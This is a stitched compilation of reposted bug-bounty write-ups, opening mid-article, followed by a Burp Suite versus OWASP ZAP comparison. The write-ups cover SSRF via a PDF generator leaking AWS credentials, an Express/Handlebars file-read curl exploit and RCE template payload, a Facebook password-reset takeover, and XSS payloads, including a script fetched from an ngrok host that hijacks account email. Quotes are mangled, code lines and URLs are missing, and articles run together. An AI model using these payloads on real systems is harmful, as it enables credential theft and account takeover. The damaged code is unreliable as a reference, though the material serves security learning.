Payload reflected without filtering/encoding/sanitizing special characters.

Root cause of this XSS was lack of input validation at server side. Website was validating email address at client side only that’s why it did not allowed me to directly input my payload in email field but as server was not filtering out or encoding special characters my payload stored and I got the pop-up.

Okay, That’s cool but where is the SSRF you promised !? 😐

Main Story begins from here.

Stored XSS is nice finding but hacker inside me was screaming “You can find critical, I want P1😜”. So, I kept hunting and came across the functionality that allows to export user inputted text in pdf file.

After seeing this functionality I remembered a write-up which was about ssrf by abusing pdf generator functionality. I have not read the write-up but I remembered the title. I quickly googled the title and found the right write-up, I read and applied the same.

Identification Part :

I was able to figure out that Custom cover page content field was vulnerable.

Image for post

What I did was, I supplied <center><u>hello there</u></center> HTML tags as an input in Custom cover page content field and exported as pdf. and I got something very interesting.

Image for post

As you can see in above screenshot, it accepted HTML tags and generated the pdf according to supplied HTML tags. Interesting..!!

Next step is to check if its vulnerable for SSRF. I confirmed that generate pdf file functionality is vulnerable for SSRF using <iframe> tag and burp collaborator client. Payload I used was:

<iframe src=“http://something.burpcollaborator.net”></iframe>

Image for post
Woah, SSRF Identified. {^_^}

HTTP request from target server is logged into my burp collaborator client window. Woah, SSRF Identified.

Root Cause: <iframe> tag used to embed/load website into another website. While generating pdf file, the target server requested my burp collaborator client to load it into <iframe> tag. As a result I got request logged into collaborator client.

Still, This SSRF does not has much impact. Let’s exploit and see what we can achieve by exploiting this SSRF.

Exploitation Part

To exploit this SSRF I used following payload.

<iframe src=“http://localhost”></iframe>

But unfortunately it doesn’t worked and showed me blank pdf file.

Image for post
Failed. -_-

After that I though to load files stored at server side. For example, /etc/passwd file. To do that I built following payload.

<iframe src=“file://etc/passwd”></iframe>

But again bad luck. Got same blank pdf file.

I used different different payloads to exploit the SSRF but I failed. Few of them are as follows. (I failed doesn’t mean you will also. Try your luck😉)

<iframe src=“file://etc/shadow”></iframe>

<iframe src=“http:localhost”></iframe>

<iframe src=“//”></iframe>

<iframe src=“”></iframe>

Any of the above payload was not working for me. Then, I thought to check the IP address which got on burp collaborator client on shodan and I came to know that the website is running on Amazon EC2 machine.

Image for post
Website is Hosted on Amazon EC2 Instance.

After considerable amount of fail attempts. I took a break and thought to ask to ritik sahni. He is my good friend and 15yo talented hacker. I called him and told him whole scenario.

He took few minutes and replied, Try to load following URL in iframe source:

As soon as I did it, I was like, Woah!! I got their internal directories and files listed out in iframe.

Image for post
Got Internal Directories and Files.

You must be wondering from where IP address came.!

The IP address is a link-local address and is valid only from the instance. In simple terms, We can say this IP is localhost for your EC2 Instance.

and by using we can retrieve instance metadata.

Then, Ritik told me to check iam/ directory. I was able to get AWS security credentials from iam directory. Have a look at below attached PoC.

Image for post

Final Payload:

<iframe src=“” width=“100%”></iframe>

Image for post

It took me around 4 hours to identify and exploit SSRF. Special thanks to my friend Ritik Sahni (@deep.tech).

Hope you enjoyed my story. If you have any questions or suggestions reach me through instagram, twitter or linkedin.

Happy Hunting. 🙂

Instagram: @street_of_hacker

Twitter: @streetofhacker

LinkedIn: Rohit Soni

Special Thanks to Ritik Sahni: @deep.tech

And also Thanks to target.com for amazing swags.😁

The Secret Parameter, LFR, and Potential RCE in NodeJS Apps

The Secret Parameter, LFR, and Potential RCE in NodeJS Apps

Original text by CAPTAINFREAK


If you are using ExpressJs with Handlebars as templating engine invoked via hbs view engine, for Server Side Rendering, you are likely vulnerable to Local File Read (LFR) and potential Remote Code Execution (RCE).


  1. If the target is responding with X-Powered-By: Express and there is HTML in responses, it’s highly likely that NodeJs with server-side templating is being used.
  2. Add layout in your wordlist of parameter discovery/fuzzing for GET query or POST body.
  3. If the arbitrary value of layout parameter added is resulting in 500 Internal Server Error with ENOENT: no such file or directory in body, You have hit the LFR.


About more than a week back, I stumbled upon a critical Local File Read (LFR) security issue which had the potential to give Remote Code Execution in a fairly simple ~10 lines of NodeJS/ExpressJs code which looked like the following:

var express = require(‘express’);
var router = express.Router();

router.get(‘/’, function(req, res, next) {

router.post(‘/’, function(req, res, next) {
var profile = req.body.profile
res.render(‘index’, profile)

module.exports = router;

The whole source can be found here.

If you are even a little bit familiar with NodeJs Ecosystem and have written at least your first Hello World endpoint in ExpressJs, you will certify that this is clearly straightforward and innocent code.

So after getting surprised and disillusioned by the security bug, I remembered that It’s indeed called Dependency Hell. To be honest, I should not have been that surprised.

The betrayal by in-built modules, dependencies, and packages have been the reason to introduce numerous security bugs. This is a re-occurring theme in software security anyway.

To check out if this is a known issue or not, I created a CTF challenge and shared it with many of my talented friends belonging to multiple community forums of Web Security, Node, Backend Engineering, CTFs, and BugBounty.https://platform.twitter.com/embed/index.html?dnt=false&embedId=twitter-widget-0&frame=false&hideCard=false&hideThread=false&id=1350083997854928897&lang=en&origin=https%3A%2F%2Fblog.shoebpatel.com%2F2021%2F01%2F23%2FThe-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps%2F&theme=dark&widgetsVersion=ed20a2b%3A1601588405575&width=550px

Node/Express.js Web Security Challenge:https://t.co/vjOUcxHdVx

Very short code: https://t.co/gkjcZ24YUt

Can you find the flag: 𝗰𝗳𝗿𝗲𝗮𝗸{.*}#nodejs #javascript #JS #ctf #bugbounty— CaptainFreak (@0xCaptainFreak) January 15, 2021

Turns out this was not known, Even after giving the whole source code of the challenge, only 4 people were able to solve it (all CTFers 🥳):

  1. @JiriPospisil
  2. @CurseRed
  3. @zevtnax
  4. @po6ix

Congrats to all the solvers 🎊 and thanks a lot to everybody who tried out the challenge.

For the people who still wanna try out, I plan to keep the Profiler Challenge up for one more week. Stop Reading and check it out now!

Challenge Solution

1curl -X ‘POST’ -H ‘Content-Type: application/json’ —data-binary $'{\»profile\»:{«layout\»: \»./../routes/index.js\»}}’ ‘http://ctf.shoebpatel.com:9090/’

HTTP request:

Host: ctf.shoebpatel.com:9090
Content-Length: 48
Content-Type: application/json

«profile»: {
«layout»: «./../routes/index.js»

HTTP Response (content of routes/index.js):

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 463

var express = require(‘express’);
var router = express.Router();

const flag = «cfreak{It’s called Dependency Hell for a reason! (https://github.com/pillarjs/hbs/blob/master/lib/hbs.js#L122)}»

/* GET home page. */
router.get(‘/’, function(req, res, next) {

router.post(‘/’, function(req, res, next) {
var profile = req.body.profile
res.render(‘index’, profile)

module.exports = router;


1«cfreak{It’s called Dependency Hell for a reason! (https://github.com/pillarjs/hbs/blob/master/lib/hbs.js#L122)}»

That’s It! What the heck, right? You might be thinking, what even is this layout parameter? and where is it even coming from. Soo out of context!

If you like Code Review, why don’t you find out? It will be a good code review exercise.

Secret layout parameter

To find out from where it is coming, we can track the flow of our input from Source to Sink till we find out the reason why LFR is happening.

Source (Line 3):

router.post(‘/’, function(req, res, next) {
var profile = req.body.profile
res.render(‘index’, profile)

Let’s follow the path this profile object argument takes.

res.render = function render(view, options, callback) {
var app = this.req.app;
var opts = options || {};

// render
app.render(view, opts, done);

“index” argument became view & our profile argument became the options parameter which became opts and got flown into app.render

app.render = function render(name, options, callback) {
var opts = options;
var renderOptions = {};
var view;

merge(renderOptions, opts);

var View = this.get(‘view’);

view = new View(name, {
defaultEngine: this.get(‘view engine’),
root: this.get(‘views’),
engines: engines

// render
tryRender(view, renderOptions, done);

function tryRender(view, options, callback) {
try {
view.render(options, callback);
} catch (err) {
View.prototype.render = function render(options, callback) {
debug(‘render «%s»‘, this.path);
this.engine(this.path, options, callback);

In View class, this.engine becomes an instance of hbs in our case and this.path = rootViewDir + viewFilename. The options argument is our profile.

I will take the liberty here and modify the code a bit to make it linear and easy to understand, but you can check out the original version on Github.

function middleware(filename, options, cb) {
// The Culprit — https://github.com/pillarjs/hbs/blob/master/lib/hbs.js#L122
var layout = options.layout;

var view_dirs = options.settings.views;
var layout_filename = [].concat(view_dirs).map(function (view_dir){
// Some code to create full paths
var view_path = path.join(view_dir, layout || ‘layout’);

// This actually restricts reading/executing files without extensions.
if (!path.extname(view_path)) {
view_path += extension;
return view_path;


// in-memory caching Code
function tryReadFileAndCache(templates) {
var template = templates.shift();
fs.readFile(template, ‘utf8’, function(err, str) {
cacheAndCompile(template, str);

function cacheAndCompile(filename, str) {
// Here we get compiled HTML from handlebars
var layout_template = handlebars.compile(str);
// Some further logic

We can stop analysing here, as you can see on Line 22 we effectively read from the Root Views Dir + layout and pass it to handlebars.compile which gives us the HTML after compiling the given file which we completely control (Except the extension cause it’s added explicitly from the config to the path if not provided already. Line. 12).

Hence the LFR, we can read any files with extensions.


As the templating is involved, we do have a strong potential for RCE. It has the following pre-requisites though:

  1. Through the above LFR read ./../package.json.
  2. See the version of hbs being used, it should be <= 4.0.3. Because after this version, the hbs team started using Handlebars.js of version >= 4.0.14Commit Link.
  3. In Handlebars below this version, it was possible to create RCE payloads. There is an awesome writeup on this by @Zombiehelp54 with which they got RCE on Shopify.
  4. And you should have a functionality of file upload on the same box with a known location, which is quite an ask considering everybody uses blob storage these days, but we never know 🤷‍♂️

With above fulfilled, you can write a handlebars template payload like below to get RCE:

<!— (by [@avlidienbrunn](https://twitter.com/avlidienbrunn)) —>

{{#with «s» as |string|}}
{{#with «e»}}
{{#with split as |conslist|}}
{{this.push (lookup string.sub «constructor»)}}
{{#with string.split as |codelist|}}
{{this.push «return JSON.stringify(process.env);»}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}

Fix 🤕

Easy fix would be to stop using the code anti-pattern shown in the above example like below:

1❌ res.render(‘index’, profile)


1✅ res.render(‘index’, { profile })

which I think many devs use already so that they can be more descriptive in templates with the usage of just “{{name}}” vs “{{profile.name}}”.

But think for a second again, is the above code safe? Yea sure, we don’t have a way to provide layout in the options argument to res.render anymore. But is there any way to still introduce the culprit layout parameter?

Prototype Pollution!

It would be ignorant if we don’t mention proto pollution in a Js/NodeJs Web Security writeup 🙃 !

Readers who are unaware of proto pollution, please watch this awesome talk from Olivier Arteau at NorthSec18.

As you can see, even the most common pattern (res.render('template', { profile })) of passing objects to render function is not safe, If the application has prototype pollution at any place with which an attacker can add layout to prototype chain, the output of every call to res.render will be overwritten with LFR/RCE. So we have DoS-ish LFR/RCE! With presence of exploitable proto pollution, this becomes quite a good gadget plus becomes unfixable unless we fix proto pollution.

Solid Fix

  1. First fix proto pollution if you are vulnerable to it.
  2. and you can remove the layout key from the object or do whatever to stop it from reaching that vulnerable Sink.

Let me know what you think should be the proper fix?

Above I have described my observations on a potentially critical vulnerability in the Setup of NodeJS + Express + HBS.

As this setup is pretty common, I wanted this writeup to be out there. The handlebars engine particularly is very popular due to it’s support of HTML symantics. Everytime I work on a side-project, I quickly setup the boilerplate code with quick one liner of express-generator cli express --view hbs and this creates the exact same stack the above issue is talking about. Don’t know how many time I might have used that code line myself. I plan to do the same kind of review for other view engines that express supports (ejs, hjs, jade, pug, twig, vash).

Anyways, thanks for Reading! If something is erroneous, please let me know, would love to have a constructive discussion.

It’s called Dependency Hell for a reason!


How I hacked Facebook: Part One

How I hacked Facebook: Part One

Original text by Alaa Abdulridha

We’ve been in this pandemic since March and once the pandemic started I was having plenty of free time, And I need to use that time wisely, So I’ve decided to take the OSWE certification and I finished the exam on 8 of August, after that, I took a couple of weeks to recover from the OSWE exam, then in the med of September, I said you know what? I did not register my name in the Facebook hall of fame for 2020 as I do every year. okay, let’s do it.

I never found a vulnerability on one of Facebook subdomains, and I took a look at some writeups and I saw one writeup in one of Facebook subdomains which got all my attention It was a great write up you can check it out [HTML to PDF converter bug leads to RCE in Facebook server.]

So after reading this write-up now I took a good idea about how many vulnerabilities I could find in such a huge web app.

So my main target was https://legal.tapprd.thefacebook.com and my goal was RCE or something similar.

I ran some fuzzing tools just to get the full endpoints of this web app and I took a 2 hours nap and watched a movie, Then I got back to see the results okay I got some good results.

Dirs found with a 403 response:

Dirs found with a 403 response:/tapprd/

Okay, I think this result is very enough to support my previous theory about how huge this application, Then I started to read the javascript files to see how the website works and what methods it uses ..etc

I noticed a way to bypass the redirection into the Login SSO, https://legal.tapprd.thefacebook.com/tapprd/portal/authentication/login and after analyzing the login page, I noticed this endpoint


and after doing some fuzzing on the user endpoint I’ve noticed another endpoint which its /savepassword and it was expecting a POST request, Then after reading the javascript files I knew how the page work, there should be a generated token and xsrf token.. etc The idea that first came to me okay, Lets test it and see if it will work I tried to change manually using burp suite but I got an error, the error was execution this operation failed.

I said okay, this might be because the email is wrong or something? let’s get an admin email, Then I started to put random emails in a list to make a wordlist and after that, I used the intruder and I said let’s see what will happen.

I got back after a couple of hours I found the same error results plus one other result, This one was 302 redirect to the login page, I said wow, I’ll be damned if this worked Haha.

So let’s get back to see what I’ve done here, I sent random requests using intruder with a CSRF token and random emails with a new password to this endpoint /savepassword

and one of the results was 302 redirect.

Image for post

Now I went to the login page and I put the login email and the new password and BOOM I logged in Successfully into the application and I can enter the admin panel 🙂

Image for post

I read the hacker report who found RCE before using the PDF and they gave him a reward of 1000$ only so I said okay, let’s make a good Impact here and a perfect exploit.

I wrote a quick and simple script to exploit this vulnerability with python you put the email and the new password and the script will change the password.

Image for post

The Impact here was so high because the Facebook workers used to login with their workplace accounts, Which mean they’re using their Facebook accounts access token, and maybe if another attacker wanted to exploit this it might give him the ability to gain access to some Facebook workers accounts .. etc

Then I reported the vulnerability and the report triaged.

And on 2 of October, I received a bounty of 7500$

Image for post

I enjoyed exploiting this vulnerability so much, so I said that’s not enough, this is a weak script! let’s dig more and more.

And I found two more vulnerabilities on the same application, But we will talk about the other vulnerabilities in the Part two writeup 🙂

You can read the write-up on my website : https://alaa.blog/2020/12/how-i-hacked-facebook-part-one/

And you can follow me on twitter : https://twitter.com/alaa0x2


Escalating XSS to Account Takeover

Escalating XSS to Account Takeover

Original text by Aditya Verma

Hey guys, this writeup is about my first Reflected XSS and how I escalated it to account takeover.

I read many Bug Hunters implying on the fact that don’t submit a simple XSS, try to escalate it. I also would tell you to escalate as much as you can, if you give them a XSS and tell what a person can do with it, it does not shows the amount of impact as you would be able to show when you prove with how it would be done; this will increase the severity as well as your payout.

So, I was hunting on a subdomain of a private program say sub.example.com, I had been looking over this subdomain for few days and had understood almost every thing about how the things are working and what a simple person(normal account) can do.Now, I started looking for other files (which are directly not linked)in various directories of the site by directory and files fuzzing using FFUF. I found a file that looked interesting as it was a page to register (let’s name it sub.example.com/fakepath/register) and the main page that opened when someone clicked for registration was sub.example.com/fakepath/registration.

Confused Jon Stewart GIF - Find & Share on GIPHY

Now this felt like maybe this page was used earlier and then they changed things.So, as you must know that old and forgotten pages have more chances of bugs.

I ran Arjun to check for any hidden parameters and luckily found a few parameters that were being reflected back on the page.Out of those parameters 2 of them were filling in the input fields of the registration form.I send the request with first parameter and it filled the value supplied thorugh URL into the city input field.Sent the request to Burpsuite Repeater and tried basic XSS inputs.Sadly, it got html encoded ; I tried single URL encoding and double URL encoding, none worked and which made me move on to check other paratmeters.

Baby Reaction GIF - Find & Share on GIPHY

After trying almost every parameter recieved from Arjun I came back to the repeater tab of the earlier one, and just randomly gave another try with Triple URL encoding and guess what the quote(“) character passed on.

Happy You Good GIF - Find & Share on GIPHY

Made a simple payload to check sub.example.com/fakepath/register?i=aditya%252522+onmouseover=alert(1)+x=%252522sI added x parameter at last to balance the quote that is being added by system. Hovered on city input field and it popped out. I checked on other parameter that was being reflected in another input field and it was also vulnerable to similar payload.I also noticed that the registration and register page are almost similar and gave a try on registration and yes both parameters were vulnerable at that page also.

Reported the Bug as medium severity and came back. Now, got the thought that try to escalate it as other people say.I was at first reluctant but since I had already checked for CSRF on various forms like edit account and much I thought since this can execute script why not fetch the account edit page with javascript which will come with CSRF token(in this case tokens) and then send the data back with email changed.

This took some time as I am not much of a developer but short time ago I had done a project with nodeJS. With little earlier familarity and lot googling I somehow put the jigsaw pieces aligned and the script was ready(I created this script on Firefox developer tools; Just incase anyone wanna know how to do it, the console panel allows running of javascript on webpage as it would have come along with the page).Hosted the script locally and used ngrok to create a tunnel to localhost.Used the following payload sub.example.com/fakepath/register?i=aditya%252522+/%25253e%25253cscript+src%3d%252522https://my_ngrok_url/script.js%252522%25253e%25253c/script%25253e

Here is the script:

let name=[];
let value=[];
.then(function(response) {
return response.text()
}).then(function (html) {// Convert the HTML string into a document object
var parser = new DOMParser();
var doc = parser.parseFromString(html, 'text/html');
//var forms=doc.forms[0];
var element = doc.querySelectorAll('input[type="hidden"]');
//var name=[];
//var value=[];
for(var i=0; i<element.length;i++){
}).catch(function (err) {
// There was an error
console.warn('Something went wrong.', err);
function sendData( data ) {
const XHR = new XMLHttpRequest(),
FD = new FormData();
// Push our data into our FormData object
for(var i=0;i<7;i++) {
FD.append( name[i],value[i] );
// Define what happens on successful data submission
XHR.addEventListener( 'load', function( event ) {
alert( 'Yeah! Data sent and response loaded.' );
} );// Define what happens in case of error
XHR.addEventListener(' error', function( event ) {
alert( 'Oops! Something went wrong.' );
} );// Set up our request
XHR.open( 'POST', 'https://sub.example.com/fakepath/accountchange.php?update=1' );// Send our FormData object; HTTP headers are set automatically
XHR.send( FD );

If anyone wanna understand the code then you can directly contact me through Twitter, my handle is 0cirius0.

Coming back now this Reflected XSS became a high severity Account Takeover.

Weaponizing XSS For Fun & Profit

Weaponizing XSS For Fun & Profit

Original text by Saad Ahmed

Hi Folks! hope you all doing good so I am back with another amazing way of bypassing the WAF which is blocking me from weaponizing the XSS, Without wasting any time let get started.

The XSS part is very simple my input is reflecting inside the HREF in <a> e.g <a href=”https://example.com/home/leet”>Home</a>

Escaping from href is very simple my payload leet” onmouseover=alert(1)” now when I move my mouse over the link the XSS is popup this is very simple & basic.

It’s time to do something BIG!!! Now I am checking all the endpoints of the WebApp that disclosing the sensitive information which I can steal from XSS and show to impact to the TEAM, so after checking all the request I came to know that on every request there is CSRF TOKEN header is present, so I need to steal that token and then need to send the request using fetch to weaponize the XSS.

I tried to remove the CSRF TOKEN from the request & bang!! the request is sent without any error & the Account information is UPDATED. But when i tried to reproduce this by creating the HTML FORM the server give 403 missing CSRF TOKEN, after checking the request the matching all the headers I came to know that the dev done some short work ( JUGAR ) to prevent from CSRF is by checking the REFERER HEADER. If the request comes from example.com then they accept it else they give 403 with missing CSRF TOKEN.

I already have XSS so don’t need to worry about the Referer ✌️Simple send the below JQUERY POST req from the console just to verifying it & it worked.

$.post(“https://example.com/account/update_info/»,{name: “Account Update”},function(data,status){alert(“Data: “ + data + “\nStatus: “ + status);});

so my final payload that update the account information is.

leet” onmouseover=’$.post(`https://example.com/account/update_info/`,{name: `Account Update`},function(data,status){alert(`Data: ` + data + `Status: ` + status);});

The payload didn’t work. nowhere the SERVER is doing something bad the server is replacing the . with _ e.g example.com becomes example_com. I tried everything here encoding etc but didn’t work, so my mind clicked why not I simply call the JS file from the server but again I need to put my server URL which also contains the & the document.createElement() is also contain .

Image for post

for those who dont know we can also used the document.createElement() without . like this document[‘createElement’](‘script’)

Image for post

so the final code that call the JSCODE from attacker server is



convert the creating the script tag into charCode beacase the server contain .

Image for post

When I Execute this from XSS the server encoding the [ ]. Sobypassing of . is useless 😠 I tried everything here bypassing the [ ] but nothing works. One of my friend told you can call script from SERVER without . & [ ] I was like tell me bruhh howww!!!


so we can use with and the return value of fromCharCode inside the eval to execute the string no need of . & [ ]

Image for post

The Final payload look like this

$.post(“https://example.com/account/update_info/»,{name: “Account Update”},function(data,status){alert(“Data: “ + data + “\nStatus: “ + status);});

converted into charCode

put he charCode value in the code look like this


Image for post

urlEncoded the above code and the final payload become

https://example.com/home/leet” onmouseover=’URLENCODED PAYLOAD’ “

send the above link to anyone & you can update his account, delete the account and many more action

The Program paid $400 for XSS and told me to submit new report for CSRF issue and they paid $1800 for CSRF and the TOTAL IS $2200

Image for post

This whole bypass and upgrading process done in 3 Days 🙌. I hope you guys learn something new here


Burp Suite vs OWASP ZAP – a Comparison series

Burp Suite vs OWASP ZAP – a Comparison series

Original text by Jaw33sh

Burp Suite {Pro} vs OWASP ZAP! Does more expensive mean better?

In this post, I would like to document some of the differences between the two most renowned interception proxies used by penetration testers as well as DevSecOps teams around the globe.


I am no expert in both tools; however, I have used them enough to feel good about documenting their features in this post. Please comment if you see an error or you want to point something I missed.


Both OWASP ZAP and Burp Suite are considered intercepting proxies (on steroids) that sits between the browser and the webserver to intercept and manipulate requests exchange.

OWASP ZAP is a free and open-source project actively maintained by volunteers while Burp Suite is a commercial Product maintained and sold by PortSwigger, They have been selected almost on every top 10 tools of the year, and in this post, I will compare version 2020.x of burp suite which saw the first release on January 2020.

We can see since they emerged to the market, they are gaining more and more momentum and users as we see in google trends for the past 5 years (2015-2020). Hopefully, by the end of this post, you will get a better understanding of their similarities and differences.

Trends between 2015 and 2020
Google Trends showing Burp suite in blue and OWASP ZAP in Red

I will discuss the differences between both tools in regards to the following aspects:

  1. Describing the User Interface
  2. Listing capabilities and features for both tools
  3. Personal User Experience with each one of them
  4. Pros and Cons of each tool 

1. User Interface

The user interface can be frustrating when you first see it. Still, after a while, it gets intuitive and has all the necessary info you need to know. Both tools have 6 simple items in their interface.

Burp Suite has a simple interface consisting of 6 simple windows.

Burp Suite 2020.2.1 User Interface
  1. Menu Bar – Provides navigation menus and tools settings
  2. Tabs Bar -Provides most of the functionality of burp in simple tabs
  3. Status Bar – Provides information for memory and disk space used by burp (new handy feature)
  4. Event Log – Provides a log for Burp Suite containing additional information
  5. Issues and Vulnerabilities window – Provides a list of detected vulnerabilities and is Active on a paid version of Burp Suite Pro or Enterprise
  6. Tasks menu – Provides simple information and control over current running, paused and finished tasks

while Zap has a simple interface consisting of also 6 simple items

ZAP 1.8.0 user interface Source: https://www.zaproxy.org/getting-started/
  1. Menu Bar – Provides access to many of the automated and manual tools.
  2. Toolbar – Includes buttons that provide easy access to most commonly used features.
  3. Tree Window – Displays the Sites tree and the Scripts tree.
  4. Workspace Window – Displays requests, responses, and scripts and allows you to edit them.
  5. Information Window – Displays details of the automated and manual tools.
  6. Footer – Displays a summary of the alerts found and the status of the main automated tools.

2. Capabilities

Both burp suite and Zap have good sets of capabilities; however, at some, a tool can excel more than the other, we will get to each one further down in separate posts.

  • Intercepting feature with SSL/TLS support and web sockets.
  • Interception History.
  • Tree navigation for scope.
  • Scope definition.
  • Manual request editor and sender.
  • Plugins, Extensions, and Marketplace/Store.
  • Vulnerability tree or Issues display.
  • Fuzzer capabilities with default lists.
  • Scan Policy configuration.
  • Report generation capability.
  • Encoders and Decoders.
  • Spider function.
  • Auto check for Update features.
  • Save and Load Project files.
  • Exposed and usable APIs .
  • Passive and Active scan engine.
  • Session Token entropy Analysis (Burp Only if you know that ZAP support this even with Addons please leave a comment).
  • Knowledge Base (Burp only, as ZAP does not support that in the UI).
  • Diff-like capability or comparison feature (Burp only AFAIK no support out of the box for ZAP).
  • Support for multiple programming and scripting languages.
  • Authentication Modules like NTLM, form authentication, and so on.

I might have missed some features so please if you know a feature I missed, please comment below.

3. User experience

A while back, I had to use both tools for comparison, While I am used to Burp Suite more from the first look, OWASP ZAP does the same functionality but has to be enhanced with plugins. keep in mind there is an easy learning curve for both.
For example, ZAP has one fuzzer window, which makes it harder to search in fuzzer results, especially when you run multiple fuzzers. At the same time, burp has different windows and configuration for each fuzz conducted. the same goes for other features.
Unlike Burp, You can’t change (add, edit or remove) HTTP headers in ZAP fuzzer window. That gives Burp an edge because it allows you to sort or search in fuzzing results faster and effectively.

zap fuzzer
Zap 2.8.0 Fuzzer window
burp fuzzer configuratability
Burp 2020.2.1 Fuzzer window

which one do you find intuitive?

One big plus for Burp is the Comparer tab, it allows for easier change detection. Like detecting differences in size from time change or tokens and content, ZAP lacks this feature without extensions (comment bellow which ZAP plugin does that).

quickly compare request or response

Another hurdle in ZAP is the ability to search for text in the request or server response, unlike Burp, which makes it more accessible. You can search for text or regex.

Burp Repeater makes it easier to search
Zap request Editor

One more thing that makes Burp more popular than Zap is the ability to detect token entropy and randomness for cryptography analysis. Very useful when session cookies are generated manually.

Burp Sequencer run statistics on tokens and calculates Entropy

However, One big plus for Zap is its API, which makes for easier integration or automation than Burp. You access the API from the browser or other user agents like curl or SDKs/libraries.

Burp Suite community edition API can only be used to write plugins and extensions, unlike ZAP which can be used on DevOps and/or DevSecOps pipelines.

A new Burp REST API was introduced in 2018 which makes it easier to integrate burp with other tools and workflows.

An example is using the API to spider a host and getting the results, e.g. crawling testphp.vulnweb.com from the console.

This feature makes OWASP ZAP the easiest to integrate into DevSecOps pipelines no matter how big or small is your environment.

ZAP API in action

For a while, Only OWASP had good resources to learn about ZAP and web application security, but recently PortSwigger also launched a very good free Web Security academy

4. Cons and Pros of each other

In my experience, ZAP is good when it comes to DevOps/DevSecOps for it’s easier API integration and support. At the same time, Burp is more oriented towards actual vulnerability assessment and penetration testing of web applications.

At the different price points for each tool, it is up to your scenario to decide if more expensive is better. Burp Pro is priced by PortSwigger at 399 USD per user per year, While OWASP ZAP is a free and open-source project under Apache 2.0 License.

In conclusion, both tools are good in their differences and use cases. tell me which tool you like and your tips and tricks for Zap or Burp (●’◡’●)